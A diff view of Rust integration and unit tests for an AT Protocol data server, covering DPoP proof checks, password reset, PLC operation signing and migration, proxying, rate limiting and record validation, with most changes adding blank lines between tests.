let result = verifier.verify_proof(&proof, "POST", "https://other.com/token", None);
1496
1547
assert!(result.is_err());
1497
1548
}
1549
+
1498
1550
#[test]
1499
1551
fn test_dpop_proof_iat_too_old() {
1500
1552
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1503
1555
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1504
1556
assert!(result.is_err());
1505
1557
}
1558
+
1506
1559
#[test]
1507
1560
fn test_dpop_proof_iat_future() {
1508
1561
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1511
1564
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1512
1565
assert!(result.is_err());
1513
1566
}
1567
+
1514
1568
#[test]
1515
1569
fn test_dpop_proof_ath_mismatch() {
1516
1570
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1530
1584
);
1531
1585
assert!(result.is_err());
1532
1586
}
1587
+
1533
1588
#[test]
1534
1589
fn test_dpop_proof_missing_ath_when_required() {
1535
1590
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1543
1598
);
1544
1599
assert!(result.is_err());
1545
1600
}
1601
+
1546
1602
#[test]
1547
1603
fn test_dpop_proof_uri_ignores_query_params() {
1548
1604
let secret = b"test-dpop-secret-32-bytes-long!!";
+9
tests/password_reset.rs
+9
tests/password_reset.rs
···
4
4
use serde_json::{json, Value};
5
5
use sqlx::PgPool;
6
6
use helpers::verify_new_account;
7
+
7
8
async fn get_pool() -> PgPool {
8
9
let conn_str = common::get_db_connection_string().await;
9
10
sqlx::postgres::PgPoolOptions::new()
···
12
13
.await
13
14
.expect("Failed to connect to test database")
14
15
}
16
+
15
17
#[tokio::test]
16
18
async fn test_request_password_reset_creates_code() {
17
19
let client = common::client();
···
51
53
assert!(code.contains('-'));
52
54
assert_eq!(code.len(), 11);
53
55
}
56
+
54
57
#[tokio::test]
55
58
async fn test_request_password_reset_unknown_email_returns_ok() {
56
59
let client = common::client();
···
63
66
.expect("Failed to request password reset");
64
67
assert_eq!(res.status(), StatusCode::OK);
65
68
}
69
+
66
70
#[tokio::test]
67
71
async fn test_reset_password_with_valid_token() {
68
72
let client = common::client();
···
142
146
.expect("Failed to login attempt");
143
147
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
144
148
}
149
+
145
150
#[tokio::test]
146
151
async fn test_reset_password_with_invalid_token() {
147
152
let client = common::client();
···
159
164
let body: Value = res.json().await.expect("Invalid JSON");
160
165
assert_eq!(body["error"], "InvalidToken");
161
166
}
167
+
162
168
#[tokio::test]
163
169
async fn test_reset_password_with_expired_token() {
164
170
let client = common::client();
···
213
219
let body: Value = res.json().await.expect("Invalid JSON");
214
220
assert_eq!(body["error"], "ExpiredToken");
215
221
}
222
+
216
223
#[tokio::test]
217
224
async fn test_reset_password_invalidates_sessions() {
218
225
let client = common::client();
···
275
282
.expect("Failed to get session");
276
283
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
277
284
}
285
+
278
286
#[tokio::test]
279
287
async fn test_request_password_reset_empty_email() {
280
288
let client = common::client();
···
289
297
let body: Value = res.json().await.expect("Invalid JSON");
290
298
assert_eq!(body["error"], "InvalidRequest");
291
299
}
300
+
292
301
#[tokio::test]
293
302
async fn test_reset_password_creates_notification() {
294
303
let pool = get_pool().await;
+20
tests/plc_migration.rs
+20
tests/plc_migration.rs
···
6
6
use sqlx::PgPool;
7
7
use wiremock::matchers::{method, path};
8
8
use wiremock::{Mock, MockServer, ResponseTemplate};
9
+
9
10
fn encode_uvarint(mut x: u64) -> Vec<u8> {
10
11
let mut out = Vec::new();
11
12
while x >= 0x80 {
···
15
16
out.push(x as u8);
16
17
out
17
18
}
19
+
18
20
fn signing_key_to_did_key(signing_key: &SigningKey) -> String {
19
21
let verifying_key = signing_key.verifying_key();
20
22
let point = verifying_key.to_encoded_point(true);
···
24
26
let encoded = multibase::encode(multibase::Base::Base58Btc, &prefixed);
25
27
format!("did:key:{}", encoded)
26
28
}
29
+
27
30
fn get_multikey_from_signing_key(signing_key: &SigningKey) -> String {
28
31
let public_key = signing_key.verifying_key();
29
32
let compressed = public_key.to_sec1_bytes();
···
31
34
buf.extend_from_slice(&compressed);
32
35
multibase::encode(multibase::Base::Base58Btc, buf)
33
36
}
37
+
34
38
async fn get_user_signing_key(did: &str) -> Option<Vec<u8>> {
35
39
let db_url = get_db_connection_string().await;
36
40
let pool = PgPool::connect(&db_url).await.ok()?;
···
48
52
.ok()??;
49
53
bspds::config::decrypt_key(&row.key_bytes, row.encryption_version).ok()
50
54
}
55
+
51
56
async fn get_plc_token_from_db(did: &str) -> Option<String> {
52
57
let db_url = get_db_connection_string().await;
53
58
let pool = PgPool::connect(&db_url).await.ok()?;
···
64
69
.await
65
70
.ok()?
66
71
}
72
+
67
73
async fn get_user_handle(did: &str) -> Option<String> {
68
74
let db_url = get_db_connection_string().await;
69
75
let pool = PgPool::connect(&db_url).await.ok()?;
···
75
81
.await
76
82
.ok()?
77
83
}
84
+
78
85
fn create_mock_last_op(
79
86
_did: &str,
80
87
handle: &str,
···
99
106
"sig": "mock_signature_for_testing"
100
107
})
101
108
}
109
+
102
110
fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> Value {
103
111
let multikey = get_multikey_from_signing_key(signing_key);
104
112
json!({
···
121
129
}]
122
130
})
123
131
}
132
+
124
133
async fn setup_mock_plc_for_sign(
125
134
did: &str,
126
135
handle: &str,
···
137
146
.await;
138
147
mock_server
139
148
}
149
+
140
150
async fn setup_mock_plc_for_submit(
141
151
did: &str,
142
152
handle: &str,
···
158
168
.await;
159
169
mock_server
160
170
}
171
+
161
172
#[tokio::test]
162
173
#[ignore = "requires mock PLC server setup that is flaky; run manually with --ignored"]
163
174
async fn test_full_plc_operation_flow() {
···
213
224
assert_eq!(operation.get("type").and_then(|v| v.as_str()), Some("plc_operation"));
214
225
assert!(operation.get("prev").is_some(), "Operation should have prev reference");
215
226
}
227
+
216
228
#[tokio::test]
217
229
#[ignore = "requires exclusive env var access; run with: cargo test test_sign_plc_operation_consumes_token -- --ignored --test-threads=1"]
218
230
async fn test_sign_plc_operation_consumes_token() {
···
278
290
"Error should indicate invalid/expired token"
279
291
);
280
292
}
293
+
281
294
#[tokio::test]
282
295
async fn test_sign_plc_operation_with_custom_fields() {
283
296
let client = client();
···
337
350
assert_eq!(also_known_as.unwrap().len(), 2, "Should have 2 aliases");
338
351
assert_eq!(rotation_keys.unwrap().len(), 2, "Should have 2 rotation keys");
339
352
}
353
+
340
354
#[tokio::test]
341
355
#[ignore = "requires mock PLC server setup that is flaky; run manually with --ignored"]
342
356
async fn test_submit_plc_operation_success() {
···
390
404
submit_body
391
405
);
392
406
}
407
+
393
408
#[tokio::test]
394
409
async fn test_submit_plc_operation_wrong_endpoint_rejected() {
395
410
let client = client();
···
441
456
let body: Value = submit_res.json().await.unwrap();
442
457
assert_eq!(body["error"], "InvalidRequest");
443
458
}
459
+
444
460
#[tokio::test]
445
461
async fn test_submit_plc_operation_wrong_signing_key_rejected() {
446
462
let client = client();
···
494
510
let body: Value = submit_res.json().await.unwrap();
495
511
assert_eq!(body["error"], "InvalidRequest");
496
512
}
513
+
497
514
#[tokio::test]
498
515
async fn test_full_sign_and_submit_flow() {
499
516
let client = client();
···
593
610
submit_body
594
611
);
595
612
}
613
+
596
614
#[tokio::test]
597
615
async fn test_cross_pds_migration_with_records() {
598
616
let client = client();
···
692
710
"Record content should match"
693
711
);
694
712
}
713
+
695
714
#[tokio::test]
696
715
async fn test_migration_rejects_wrong_did_document() {
697
716
let client = client();
···
749
768
"Error should mention signature verification failure"
750
769
);
751
770
}
771
+
752
772
#[tokio::test]
753
773
#[ignore = "requires exclusive env var access; run with: cargo test test_full_migration_flow_end_to_end -- --ignored --test-threads=1"]
754
774
async fn test_full_migration_flow_end_to_end() {
+15
tests/plc_operations.rs
+15
tests/plc_operations.rs
···
3
3
use reqwest::StatusCode;
4
4
use serde_json::json;
5
5
use sqlx::PgPool;
6
+
6
7
#[tokio::test]
7
8
async fn test_request_plc_operation_signature_requires_auth() {
8
9
let client = client();
···
16
17
.expect("Request failed");
17
18
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
18
19
}
20
+
19
21
#[tokio::test]
20
22
async fn test_request_plc_operation_signature_success() {
21
23
let client = client();
···
31
33
.expect("Request failed");
32
34
assert_eq!(res.status(), StatusCode::OK);
33
35
}
36
+
34
37
#[tokio::test]
35
38
async fn test_sign_plc_operation_requires_auth() {
36
39
let client = client();
···
45
48
.expect("Request failed");
46
49
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
47
50
}
51
+
48
52
#[tokio::test]
49
53
async fn test_sign_plc_operation_requires_token() {
50
54
let client = client();
···
63
67
let body: serde_json::Value = res.json().await.unwrap();
64
68
assert_eq!(body["error"], "InvalidRequest");
65
69
}
70
+
66
71
#[tokio::test]
67
72
async fn test_sign_plc_operation_invalid_token() {
68
73
let client = client();
···
83
88
let body: serde_json::Value = res.json().await.unwrap();
84
89
assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken");
85
90
}
91
+
86
92
#[tokio::test]
87
93
async fn test_submit_plc_operation_requires_auth() {
88
94
let client = client();
···
99
105
.expect("Request failed");
100
106
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
101
107
}
108
+
102
109
#[tokio::test]
103
110
async fn test_submit_plc_operation_invalid_operation() {
104
111
let client = client();
···
121
128
let body: serde_json::Value = res.json().await.unwrap();
122
129
assert_eq!(body["error"], "InvalidRequest");
123
130
}
131
+
124
132
#[tokio::test]
125
133
async fn test_submit_plc_operation_missing_sig() {
126
134
let client = client();
···
148
156
let body: serde_json::Value = res.json().await.unwrap();
149
157
assert_eq!(body["error"], "InvalidRequest");
150
158
}
159
+
151
160
#[tokio::test]
152
161
async fn test_submit_plc_operation_wrong_service_endpoint() {
153
162
let client = client();
···
179
188
.expect("Request failed");
180
189
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
181
190
}
191
+
182
192
#[tokio::test]
183
193
async fn test_request_plc_operation_creates_token_in_db() {
184
194
let client = client();
···
213
223
assert!(row.token.contains('-'), "Token should contain hyphen");
214
224
assert!(row.expires_at > chrono::Utc::now(), "Token should not be expired");
215
225
}
226
+
216
227
#[tokio::test]
217
228
async fn test_request_plc_operation_replaces_existing_token() {
218
229
let client = client();
···
278
289
.expect("Count query failed");
279
290
assert_eq!(count, 1, "Should only have one token per user");
280
291
}
292
+
281
293
#[tokio::test]
282
294
async fn test_submit_plc_operation_wrong_verification_method() {
283
295
let client = client();
···
321
333
body
322
334
);
323
335
}
336
+
324
337
#[tokio::test]
325
338
async fn test_submit_plc_operation_wrong_handle() {
326
339
let client = client();
···
357
370
let body: serde_json::Value = res.json().await.unwrap();
358
371
assert_eq!(body["error"], "InvalidRequest");
359
372
}
373
+
360
374
#[tokio::test]
361
375
async fn test_submit_plc_operation_wrong_service_type() {
362
376
let client = client();
···
393
407
let body: serde_json::Value = res.json().await.unwrap();
394
408
assert_eq!(body["error"], "InvalidRequest");
395
409
}
410
+
396
411
#[tokio::test]
397
412
async fn test_plc_token_expiry_format() {
398
413
let client = client();
+29
tests/plc_validation.rs
+29
tests/plc_validation.rs
···
7
7
use k256::ecdsa::SigningKey;
8
8
use serde_json::json;
9
9
use std::collections::HashMap;
10
+
10
11
fn create_valid_operation() -> serde_json::Value {
11
12
let key = SigningKey::random(&mut rand::thread_rng());
12
13
let did_key = signing_key_to_did_key(&key);
···
27
28
});
28
29
sign_operation(&op, &key).unwrap()
29
30
}
31
+
30
32
#[test]
31
33
fn test_validate_plc_operation_valid() {
32
34
let op = create_valid_operation();
33
35
let result = validate_plc_operation(&op);
34
36
assert!(result.is_ok());
35
37
}
38
+
36
39
#[test]
37
40
fn test_validate_plc_operation_missing_type() {
38
41
let op = json!({
···
45
48
let result = validate_plc_operation(&op);
46
49
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")));
47
50
}
51
+
48
52
#[test]
49
53
fn test_validate_plc_operation_invalid_type() {
50
54
let op = json!({
···
54
58
let result = validate_plc_operation(&op);
55
59
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")));
56
60
}
61
+
57
62
#[test]
58
63
fn test_validate_plc_operation_missing_sig() {
59
64
let op = json!({
···
66
71
let result = validate_plc_operation(&op);
67
72
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")));
68
73
}
74
+
69
75
#[test]
70
76
fn test_validate_plc_operation_missing_rotation_keys() {
71
77
let op = json!({
···
78
84
let result = validate_plc_operation(&op);
79
85
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")));
80
86
}
87
+
81
88
#[test]
82
89
fn test_validate_plc_operation_missing_verification_methods() {
83
90
let op = json!({
···
90
97
let result = validate_plc_operation(&op);
91
98
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")));
92
99
}
100
+
93
101
#[test]
94
102
fn test_validate_plc_operation_missing_also_known_as() {
95
103
let op = json!({
···
102
110
let result = validate_plc_operation(&op);
103
111
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")));
104
112
}
113
+
105
114
#[test]
106
115
fn test_validate_plc_operation_missing_services() {
107
116
let op = json!({
···
114
123
let result = validate_plc_operation(&op);
115
124
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("services")));
116
125
}
126
+
117
127
#[test]
118
128
fn test_validate_rotation_key_required() {
119
129
let key = SigningKey::random(&mut rand::thread_rng());
···
141
151
let result = validate_plc_operation_for_submission(&op, &ctx);
142
152
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")));
143
153
}
154
+
144
155
#[test]
145
156
fn test_validate_signing_key_match() {
146
157
let key = SigningKey::random(&mut rand::thread_rng());
···
168
179
let result = validate_plc_operation_for_submission(&op, &ctx);
169
180
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")));
170
181
}
182
+
171
183
#[test]
172
184
fn test_validate_handle_match() {
173
185
let key = SigningKey::random(&mut rand::thread_rng());
···
194
206
let result = validate_plc_operation_for_submission(&op, &ctx);
195
207
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")));
196
208
}
209
+
197
210
#[test]
198
211
fn test_validate_pds_service_type() {
199
212
let key = SigningKey::random(&mut rand::thread_rng());
···
220
233
let result = validate_plc_operation_for_submission(&op, &ctx);
221
234
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("type")));
222
235
}
236
+
223
237
#[test]
224
238
fn test_validate_pds_endpoint_match() {
225
239
let key = SigningKey::random(&mut rand::thread_rng());
···
246
260
let result = validate_plc_operation_for_submission(&op, &ctx);
247
261
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")));
248
262
}
263
+
249
264
#[test]
250
265
fn test_verify_signature_secp256k1() {
251
266
let key = SigningKey::random(&mut rand::thread_rng());
···
264
279
assert!(result.is_ok());
265
280
assert!(result.unwrap());
266
281
}
282
+
267
283
#[test]
268
284
fn test_verify_signature_wrong_key() {
269
285
let key = SigningKey::random(&mut rand::thread_rng());
···
283
299
assert!(result.is_ok());
284
300
assert!(!result.unwrap());
285
301
}
302
+
286
303
#[test]
287
304
fn test_verify_signature_invalid_did_key_format() {
288
305
let key = SigningKey::random(&mut rand::thread_rng());
···
300
317
assert!(result.is_ok());
301
318
assert!(!result.unwrap());
302
319
}
320
+
303
321
#[test]
304
322
fn test_tombstone_validation() {
305
323
let op = json!({
···
310
328
let result = validate_plc_operation(&op);
311
329
assert!(result.is_ok());
312
330
}
331
+
313
332
#[test]
314
333
fn test_cid_for_cbor_deterministic() {
315
334
let value = json!({
···
321
340
assert_eq!(cid1, cid2, "CID generation should be deterministic");
322
341
assert!(cid1.starts_with("bafyrei"), "CID should start with bafyrei (dag-cbor + sha256)");
323
342
}
343
+
324
344
#[test]
325
345
fn test_cid_different_for_different_data() {
326
346
let value1 = json!({"data": 1});
···
329
349
let cid2 = cid_for_cbor(&value2).unwrap();
330
350
assert_ne!(cid1, cid2, "Different data should produce different CIDs");
331
351
}
352
+
332
353
#[test]
333
354
fn test_signing_key_to_did_key_format() {
334
355
let key = SigningKey::random(&mut rand::thread_rng());
···
336
357
assert!(did_key.starts_with("did:key:z"), "Should start with did:key:z");
337
358
assert!(did_key.len() > 50, "Did key should be reasonably long");
338
359
}
360
+
339
361
#[test]
340
362
fn test_signing_key_to_did_key_unique() {
341
363
let key1 = SigningKey::random(&mut rand::thread_rng());
···
344
366
let did2 = signing_key_to_did_key(&key2);
345
367
assert_ne!(did1, did2, "Different keys should produce different did:keys");
346
368
}
369
+
347
370
#[test]
348
371
fn test_signing_key_to_did_key_consistent() {
349
372
let key = SigningKey::random(&mut rand::thread_rng());
···
351
374
let did2 = signing_key_to_did_key(&key);
352
375
assert_eq!(did1, did2, "Same key should produce same did:key");
353
376
}
377
+
354
378
#[test]
355
379
fn test_sign_operation_removes_existing_sig() {
356
380
let key = SigningKey::random(&mut rand::thread_rng());
···
367
391
let new_sig = signed.get("sig").and_then(|v| v.as_str()).unwrap();
368
392
assert_ne!(new_sig, "old_signature", "Should replace old signature");
369
393
}
394
+
370
395
#[test]
371
396
fn test_validate_plc_operation_not_object() {
372
397
let result = validate_plc_operation(&json!("not an object"));
373
398
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
374
399
}
400
+
375
401
#[test]
376
402
fn test_validate_for_submission_tombstone_passes() {
377
403
let key = SigningKey::random(&mut rand::thread_rng());
···
390
416
let result = validate_plc_operation_for_submission(&op, &ctx);
391
417
assert!(result.is_ok(), "Tombstone should pass submission validation");
392
418
}
419
+
393
420
#[test]
394
421
fn test_verify_signature_missing_sig() {
395
422
let op = json!({
···
402
429
let result = verify_operation_signature(&op, &[]);
403
430
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
404
431
}
432
+
405
433
#[test]
406
434
fn test_verify_signature_invalid_base64() {
407
435
let op = json!({
···
415
443
let result = verify_operation_signature(&op, &[]);
416
444
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
417
445
}
446
+
418
447
#[test]
419
448
fn test_plc_operation_struct() {
420
449
let mut services = HashMap::new();
+5
tests/proxy.rs
+5
tests/proxy.rs
···
4
4
use reqwest::Client;
5
5
use std::sync::Arc;
6
6
use tokio::net::TcpListener;
7
+
7
8
async fn spawn_mock_upstream() -> (
8
9
String,
9
10
tokio::sync::mpsc::Receiver<(String, String, Option<String>)>,
···
31
32
});
32
33
(format!("http://{}", addr), rx)
33
34
}
35
+
34
36
#[tokio::test]
35
37
async fn test_proxy_via_header() {
36
38
let app_url = common::base_url().await;
···
49
51
assert_eq!(uri, "/xrpc/com.example.test");
50
52
assert_eq!(auth, Some("Bearer test-token".to_string()));
51
53
}
54
+
52
55
#[tokio::test]
53
56
async fn test_proxy_auth_signing() {
54
57
let app_url = common::base_url().await;
···
77
80
assert_eq!(claims["aud"], upstream_url);
78
81
assert_eq!(claims["lxm"], "com.example.signed");
79
82
}
83
+
80
84
#[tokio::test]
81
85
async fn test_proxy_post_with_body() {
82
86
let app_url = common::base_url().await;
···
100
104
assert_eq!(uri, "/xrpc/com.example.postMethod");
101
105
assert_eq!(auth, Some("Bearer test-token".to_string()));
102
106
}
107
+
103
108
#[tokio::test]
104
109
async fn test_proxy_with_query_params() {
105
110
let app_url = common::base_url().await;
+5
tests/rate_limit.rs
+5
tests/rate_limit.rs
···
2
2
use common::{base_url, client};
3
3
use reqwest::StatusCode;
4
4
use serde_json::json;
5
+
5
6
#[tokio::test]
6
7
#[ignore = "rate limiting is disabled in test environment"]
7
8
async fn test_login_rate_limiting() {
···
39
40
rate_limited_count
40
41
);
41
42
}
43
+
42
44
#[tokio::test]
43
45
#[ignore = "rate limiting is disabled in test environment"]
44
46
async fn test_password_reset_rate_limiting() {
···
78
80
success_count
79
81
);
80
82
}
83
+
81
84
#[tokio::test]
82
85
#[ignore = "rate limiting is disabled in test environment"]
83
86
async fn test_account_creation_rate_limiting() {
···
117
120
rate_limited_count
118
121
);
119
122
}
123
+
120
124
#[tokio::test]
121
125
async fn test_valkey_connection() {
122
126
if std::env::var("VALKEY_URL").is_err() {
···
154
158
.await
155
159
.expect("DEL failed");
156
160
}
161
+
157
162
#[tokio::test]
158
163
async fn test_distributed_rate_limiter_directly() {
159
164
if std::env::var("VALKEY_URL").is_err() {
+53
tests/record_validation.rs
+53
tests/record_validation.rs
···
1
1
use bspds::validation::{RecordValidator, ValidationError, ValidationStatus, validate_record_key, validate_collection_nsid};
2
2
use serde_json::json;
3
+
3
4
fn now() -> String {
4
5
chrono::Utc::now().to_rfc3339()
5
6
}
7
+
6
8
#[test]
7
9
fn test_validate_post_valid() {
8
10
let validator = RecordValidator::new();
···
14
16
let result = validator.validate(&post, "app.bsky.feed.post");
15
17
assert_eq!(result.unwrap(), ValidationStatus::Valid);
16
18
}
19
+
17
20
#[test]
18
21
fn test_validate_post_missing_text() {
19
22
let validator = RecordValidator::new();
···
24
27
let result = validator.validate(&post, "app.bsky.feed.post");
25
28
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "text"));
26
29
}
30
+
27
31
#[test]
28
32
fn test_validate_post_missing_created_at() {
29
33
let validator = RecordValidator::new();
···
34
38
let result = validator.validate(&post, "app.bsky.feed.post");
35
39
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "createdAt"));
36
40
}
41
+
37
42
#[test]
38
43
fn test_validate_post_text_too_long() {
39
44
let validator = RecordValidator::new();
···
46
51
let result = validator.validate(&post, "app.bsky.feed.post");
47
52
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "text"));
48
53
}
54
+
49
55
#[test]
50
56
fn test_validate_post_text_at_limit() {
51
57
let validator = RecordValidator::new();
···
58
64
let result = validator.validate(&post, "app.bsky.feed.post");
59
65
assert_eq!(result.unwrap(), ValidationStatus::Valid);
60
66
}
67
+
61
68
#[test]
62
69
fn test_validate_post_too_many_langs() {
63
70
let validator = RecordValidator::new();
···
70
77
let result = validator.validate(&post, "app.bsky.feed.post");
71
78
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "langs"));
72
79
}
80
+
73
81
#[test]
74
82
fn test_validate_post_three_langs_ok() {
75
83
let validator = RecordValidator::new();
···
82
90
let result = validator.validate(&post, "app.bsky.feed.post");
83
91
assert_eq!(result.unwrap(), ValidationStatus::Valid);
84
92
}
93
+
85
94
#[test]
86
95
fn test_validate_post_too_many_tags() {
87
96
let validator = RecordValidator::new();
···
94
103
let result = validator.validate(&post, "app.bsky.feed.post");
95
104
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "tags"));
96
105
}
106
+
97
107
#[test]
98
108
fn test_validate_post_eight_tags_ok() {
99
109
let validator = RecordValidator::new();
···
106
116
let result = validator.validate(&post, "app.bsky.feed.post");
107
117
assert_eq!(result.unwrap(), ValidationStatus::Valid);
108
118
}
119
+
109
120
#[test]
110
121
fn test_validate_post_tag_too_long() {
111
122
let validator = RecordValidator::new();
···
119
130
let result = validator.validate(&post, "app.bsky.feed.post");
120
131
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")));
121
132
}
133
+
122
134
#[test]
123
135
fn test_validate_profile_valid() {
124
136
let validator = RecordValidator::new();
···
130
142
let result = validator.validate(&profile, "app.bsky.actor.profile");
131
143
assert_eq!(result.unwrap(), ValidationStatus::Valid);
132
144
}
145
+
133
146
#[test]
134
147
fn test_validate_profile_empty_ok() {
135
148
let validator = RecordValidator::new();
···
139
152
let result = validator.validate(&profile, "app.bsky.actor.profile");
140
153
assert_eq!(result.unwrap(), ValidationStatus::Valid);
141
154
}
155
+
142
156
#[test]
143
157
fn test_validate_profile_displayname_too_long() {
144
158
let validator = RecordValidator::new();
···
150
164
let result = validator.validate(&profile, "app.bsky.actor.profile");
151
165
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
152
166
}
167
+
153
168
#[test]
154
169
fn test_validate_profile_description_too_long() {
155
170
let validator = RecordValidator::new();
···
161
176
let result = validator.validate(&profile, "app.bsky.actor.profile");
162
177
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description"));
163
178
}
179
+
164
180
#[test]
165
181
fn test_validate_like_valid() {
166
182
let validator = RecordValidator::new();
···
175
191
let result = validator.validate(&like, "app.bsky.feed.like");
176
192
assert_eq!(result.unwrap(), ValidationStatus::Valid);
177
193
}
194
+
178
195
#[test]
179
196
fn test_validate_like_missing_subject() {
180
197
let validator = RecordValidator::new();
···
185
202
let result = validator.validate(&like, "app.bsky.feed.like");
186
203
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
187
204
}
205
+
188
206
#[test]
189
207
fn test_validate_like_missing_subject_uri() {
190
208
let validator = RecordValidator::new();
···
198
216
let result = validator.validate(&like, "app.bsky.feed.like");
199
217
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri")));
200
218
}
219
+
201
220
#[test]
202
221
fn test_validate_like_invalid_subject_uri() {
203
222
let validator = RecordValidator::new();
···
212
231
let result = validator.validate(&like, "app.bsky.feed.like");
213
232
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")));
214
233
}
234
+
215
235
#[test]
216
236
fn test_validate_repost_valid() {
217
237
let validator = RecordValidator::new();
···
226
246
let result = validator.validate(&repost, "app.bsky.feed.repost");
227
247
assert_eq!(result.unwrap(), ValidationStatus::Valid);
228
248
}
249
+
229
250
#[test]
230
251
fn test_validate_repost_missing_subject() {
231
252
let validator = RecordValidator::new();
···
236
257
let result = validator.validate(&repost, "app.bsky.feed.repost");
237
258
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
238
259
}
260
+
239
261
#[test]
240
262
fn test_validate_follow_valid() {
241
263
let validator = RecordValidator::new();
···
247
269
let result = validator.validate(&follow, "app.bsky.graph.follow");
248
270
assert_eq!(result.unwrap(), ValidationStatus::Valid);
249
271
}
272
+
250
273
#[test]
251
274
fn test_validate_follow_missing_subject() {
252
275
let validator = RecordValidator::new();
···
257
280
let result = validator.validate(&follow, "app.bsky.graph.follow");
258
281
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
259
282
}
283
+
260
284
#[test]
261
285
fn test_validate_follow_invalid_subject() {
262
286
let validator = RecordValidator::new();
···
268
292
let result = validator.validate(&follow, "app.bsky.graph.follow");
269
293
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
270
294
}
295
+
271
296
#[test]
272
297
fn test_validate_block_valid() {
273
298
let validator = RecordValidator::new();
···
279
304
let result = validator.validate(&block, "app.bsky.graph.block");
280
305
assert_eq!(result.unwrap(), ValidationStatus::Valid);
281
306
}
307
+
282
308
#[test]
283
309
fn test_validate_block_invalid_subject() {
284
310
let validator = RecordValidator::new();
···
290
316
let result = validator.validate(&block, "app.bsky.graph.block");
291
317
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
292
318
}
319
+
293
320
#[test]
294
321
fn test_validate_list_valid() {
295
322
let validator = RecordValidator::new();
···
302
329
let result = validator.validate(&list, "app.bsky.graph.list");
303
330
assert_eq!(result.unwrap(), ValidationStatus::Valid);
304
331
}
332
+
305
333
#[test]
306
334
fn test_validate_list_name_too_long() {
307
335
let validator = RecordValidator::new();
···
315
343
let result = validator.validate(&list, "app.bsky.graph.list");
316
344
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
317
345
}
346
+
318
347
#[test]
319
348
fn test_validate_list_empty_name() {
320
349
let validator = RecordValidator::new();
···
327
356
let result = validator.validate(&list, "app.bsky.graph.list");
328
357
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
329
358
}
359
+
330
360
#[test]
331
361
fn test_validate_feed_generator_valid() {
332
362
let validator = RecordValidator::new();
···
339
369
let result = validator.validate(&generator, "app.bsky.feed.generator");
340
370
assert_eq!(result.unwrap(), ValidationStatus::Valid);
341
371
}
372
+
342
373
#[test]
343
374
fn test_validate_feed_generator_displayname_too_long() {
344
375
let validator = RecordValidator::new();
···
352
383
let result = validator.validate(&generator, "app.bsky.feed.generator");
353
384
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
354
385
}
386
+
355
387
#[test]
356
388
fn test_validate_unknown_type_returns_unknown() {
357
389
let validator = RecordValidator::new();
···
362
394
let result = validator.validate(&custom, "com.custom.record");
363
395
assert_eq!(result.unwrap(), ValidationStatus::Unknown);
364
396
}
397
+
365
398
#[test]
366
399
fn test_validate_unknown_type_strict_rejects() {
367
400
let validator = RecordValidator::new().require_lexicon(true);
···
372
405
let result = validator.validate(&custom, "com.custom.record");
373
406
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
374
407
}
408
+
375
409
#[test]
376
410
fn test_validate_type_mismatch() {
377
411
let validator = RecordValidator::new();
···
384
418
assert!(matches!(result, Err(ValidationError::TypeMismatch { expected, actual })
385
419
if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like"));
386
420
}
421
+
387
422
#[test]
388
423
fn test_validate_missing_type() {
389
424
let validator = RecordValidator::new();
···
393
428
let result = validator.validate(&record, "app.bsky.feed.post");
394
429
assert!(matches!(result, Err(ValidationError::MissingType)));
395
430
}
431
+
396
432
#[test]
397
433
fn test_validate_not_object() {
398
434
let validator = RecordValidator::new();
···
400
436
let result = validator.validate(&record, "app.bsky.feed.post");
401
437
